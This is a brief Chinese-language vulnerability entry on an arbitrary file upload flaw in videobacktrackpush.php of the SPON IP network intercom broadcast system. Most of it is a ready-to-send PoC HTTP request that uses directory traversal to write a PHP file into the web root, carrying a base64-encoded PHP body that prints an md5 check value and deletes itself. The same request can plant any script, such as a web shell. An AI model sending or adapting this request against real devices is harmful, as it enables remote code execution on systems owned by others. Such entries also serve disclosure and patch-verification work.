漏洞描述
文件上传漏洞发生在应用程序允许用户上传文件的功能中,如果上传功能未能正确地验证和限制上传文件的类型和内容,攻击者可能利用此漏洞上传恶意文件,如包含可执行代码的脚本文件,从而在服务器上执行任意命令,控制或破坏系统。
世邦IP网络对讲广播系统 videobacktrackpush.php 任意文件上传漏洞
PoC代码
POST /php/videobacktrackpush.php HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/8.54.(X11; Linux i686; fur-IT) Presto/2.9.160 Version/12.00
jsondata[caller]=1&jsondata[callee]=../../../../../../ICPAS/Wnmp/WWW&jsondata[videoname]=IEh1al.php&jsondata[videocontent]=PD9waHAgZWNobyBtZDUoMTAwODY2Nik7dW5saW5rKF9fRklMRV9fKTs/Pg%3d%3d